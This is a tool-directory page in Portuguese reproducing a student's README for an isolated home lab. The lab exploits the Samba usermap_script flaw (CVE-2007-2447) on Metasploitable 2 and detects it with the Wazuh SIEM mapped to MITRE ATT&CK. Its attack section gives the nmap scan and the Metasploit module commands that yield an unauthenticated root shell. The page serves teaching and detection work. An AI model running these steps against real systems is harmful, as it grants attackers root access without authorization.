Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2007-2447-Exploitation-SIEM-Detection-Lab — Laboratório de ataque AD/Linux isolado: CVE-2007-2447 explorado por meio do Metasploit, detectado com Wazuh SIEM mapeado para MITRE ATT&CK (T1190, T1059) | Kitploit
Ferramentas/GitHubGitHub/harshiys/cve-2007-2447-exploitation-siem-detection-lab
ReconhecimentoFrameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoInteligência de AmeaçasDetecção de IntrusãoAprendizado e EducaçãoAnálise de Logs

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Labs e Prática
GitHubharshiys/cve-2007-2447-exploitation-siem-detection-lab

CVE-2007-2447-Exploitation-SIEM-Detection-Lab

Laboratório de ataque AD/Linux isolado: CVE-2007-2447 explorado por meio do Metasploit, detectado com Wazuh SIEM mapeado para MITRE ATT&CK (T1190, T1059)

Ver Repositório
há 4 diasAinda não revisado
Compartilhar

🛡️ Laboratório de Exploração & Detecção com SIEM da CVE-2007-2447 (Wazuh + MITRE ATT&CK)

Projeto B.Tech (BTP) | IIIT Pune Baseado em: "Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring" — ICCCNT 2023, IIT Delhi

Um laboratório doméstico de cibersegurança totalmente funcional, construído em uma única máquina usando ferramentas gratuitas e de código aberto. O laboratório simula um ciclo de vida de ataque do mundo real — Reconhecimento → Exploração → Detecção — e demonstra como um SIEM pode detectar e mapear ataques para a estrutura MITRE ATT&CK em tempo real.


📐 Arquitetura do Laboratório

root@kitploit:~
┌─────────────────────────────────────────────────┐
│           VirtualBox — Internal Network          │
│              (cyberlab, 10.0.0.x/24)             │
│                                                  │
│  ┌──────────┐   ┌──────────────┐   ┌──────────┐ │
│  │  Kali    │   │ Metasploitable│  │  Ubuntu  │ │
│  │ 10.0.0.1 │◄─►│   10.0.0.2   │◄─►│ 10.0.0.3 │ │
│  │ ATTACKER │   │    VICTIM     │  │   SIEM   │ │
│  └──────────┘   └──────────────┘   └──────────┘ │
└─────────────────────────────────────────────────┘
         Host-Only Adapter (192.168.56.103)
         → Wazuh Dashboard access from browser

🧰 Ferramentas e Tecnologias


🔧 Guia de Configuração

Pré-requisitos

  • Uma máquina com pelo menos 16 GB de RAM (as 3 VMs rodam simultaneamente)
  • VirtualBox 7.x instalado
  • ~50 GB de espaço livre em disco

Passo 1 — Configuração de Rede no VirtualBox

Crie uma Rede Interna chamada cyberlab no VirtualBox. Todas as três VMs recebem este adaptador. A VM Ubuntu/Wazuh recebe um Adaptador Host-Only adicional para que você possa acessar o dashboard pelo navegador.


Passo 2 — Kali Linux (Atacante)

  1. Baixe a imagem do Kali Linux para VirtualBox
  2. Importe e atribua o adaptador de rede interna cyberlab
  3. Defina um IP estático:
root@kitploit:~
# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.0.1
    netmask 255.255.255.0
  1. Reinicie a rede: sudo systemctl restart networking

Passo 3 — Metasploitable 2 (Vítima)

  1. Baixe o Metasploitable 2
  2. Importe no VirtualBox e atribua a rede cyberlab
  3. Defina o IP estático:
root@kitploit:~
# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.0.2
    netmask 255.255.255.0

⚠️ Nunca exponha o Metasploitable 2 à internet. Ele é propositalmente inseguro.


Passo 4 — Ubuntu + Wazuh SIEM (Defensor)

  1. Instale o Ubuntu Server 22.04
  2. Atribua dois adaptadores: cyberlab interno + Host-Only
  3. Configure o IP estático via netplan (/etc/netplan/01-network-manager-all.yaml):
root@kitploit:~
network:
  version: 2
  renderer: NetworkManager
  ethernets:
    enp0s3:
      addresses:
        - 10.0.0.3/24
    enp0s8:
      dhcp4: true
  1. Instale o Wazuh (nó único):
root@kitploit:~
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
  1. Acesse o dashboard em: https://192.168.56.103 (pelo navegador do host)

Passo 5 — Conecte o Metasploitable ao Wazuh via Syslog

Como o Metasploitable 2 não pode executar um agente do Wazuh, configure o encaminhamento de syslog para monitoramento sem agente:

No Metasploitable, adicione ao /etc/rsyslog.conf:

root@kitploit:~
*.* @10.0.0.3:514

No Wazuh (Ubuntu), habilite a entrada de syslog em /var/ossec/etc/ossec.conf:

root@kitploit:~
<remote>
  <connection>syslog</connection>
  <port>514</port>
  <protocol>udp</protocol>
</remote>

Reinicie o Wazuh: sudo systemctl restart wazuh-manager


⚔️ Simulação de Ataque

Fase 1 — Reconhecimento (Nmap)

root@kitploit:~
# From Kali
nmap -sV -O 10.0.0.2

Principais serviços descobertos no Metasploitable 2:

Mais de 20 portas abertas descobertas. SO identificado: Linux 2.6.x


Fase 2 — Exploração (Metasploit)

Vulnerabilidade: CVE-2007-2447 — Injeção de comando usermap_script do Samba

Permite execução remota de código sem autenticação por meio de requisições MS-RPC malformadas no Samba 3.0.0–3.0.25rc3.

root@kitploit:~
# From Kali — launch Metasploit
msfconsole

# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run

# Verify root access
whoami
# Output: root

Fase 3 — Detecção (Wazuh SIEM)

Após a exploração, o Wazuh detectou e mapeou automaticamente os eventos para MITRE ATT&CK:

Total de eventos detectados: 55+

Acesse o dashboard em https://192.168.56.103 → Security Events → MITRE ATT&CK


📊 Principais Resultados

  • ✅ Ciclo de vida completo do ataque replicado com sucesso em um ambiente isolado
  • ✅ CVE-2007-2447 obteve shell root sem autenticação em segundos
  • ✅ O SIEM Wazuh detectou e mapeou todos os ataques para o MITRE ATT&CK em tempo real
  • ✅ O encaminhamento de syslog permitiu o monitoramento sem agente do sistema legado Metasploitable
  • ✅ O laboratório inteiro roda em uma única máquina host com 16 GB de RAM

📁 Estrutura do Repositório

root@kitploit:~
cybersecurity-home-lab/
│
├── README.md                  ← You are here
├── network-config/
│   ├── kali-interfaces.txt    ← Kali static IP config
│   ├── metasploitable-interfaces.txt
│   └── ubuntu-netplan.yaml    ← Ubuntu/SIEM netplan config
├── wazuh-config/
│   └── ossec.conf             ← Wazuh syslog/agent config
├── screenshots/
│   ├── nmap-scan.png
│   ├── metasploit-exploit.png
│   ├── wazuh-dashboard.png
│   └── wazuh-alerts-table.png
└── report/
    └── ICCCNT_2023_paper.pdf  ← Reference research paper

🔗 Referência

Dadiyala, C. et al. (2023). Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring. 14th International Conference on Computing, Communication and Networking Technologies (ICCCNT), IIT Delhi. IEEE-56998.


⚠️ Aviso Legal

Este laboratório é construído inteiramente em máquinas virtuais isoladas, sem acesso à internet durante as simulações de ataque. Todas as ferramentas e técnicas são usadas estritamente para fins educacionais em um ambiente controlado. Não tente reproduzir nenhuma técnica de ataque em sistemas que você não possui ou para os quais não tenha permissão explícita para testar.


Apresentado por Harshita Verma | IIIT Pune

Baixar ferramenta
VMFunçãoIPFerramentas
Kali Linux 2026.1Atacante10.0.0.1Nmap, Metasploit
Metasploitable 2Vítima10.0.0.220+ vulnerabilidades
Ubuntu 22.04 + WazuhSIEM10.0.0.3Wazuh v4.7.5
FerramentaVersãoFinalidade
VirtualBox7.xHypervisor — executa todas as VMs em um único host
Kali Linux2026.1SO de teste de penetração (ofensivo)
Metasploitable 2v2.0Alvo propositalmente vulnerável
Wazuhv4.7.5SIEM de código aberto (defensivo)
NmapMais recenteVarredura de rede/portas
Metasploit FrameworkMais recenteFramework de exploração
PortaServiçoVersão
21/tcpFTPvsftpd 2.3.4
22/tcpSSHOpenSSH 4.7p1
80/tcpHTTPApache 2.2.8
139/445SMBSamba 3.x–4.x
3306/tcpMySQL5.0.51a
5432/tcpPostgreSQL8.3
ID da RegraDescriçãoTécnica MITRETática
5402Execução de sudo para ROOT bem-sucedidaT1548.003Escalação de Privilégios
5501PAM: Sessão de login abertaT1078Acesso Inicial / Persistência
5502PAM: Sessão de login fechadaT1078Evasão de Defesa
502Servidor Wazuh iniciado—Detecção Ativa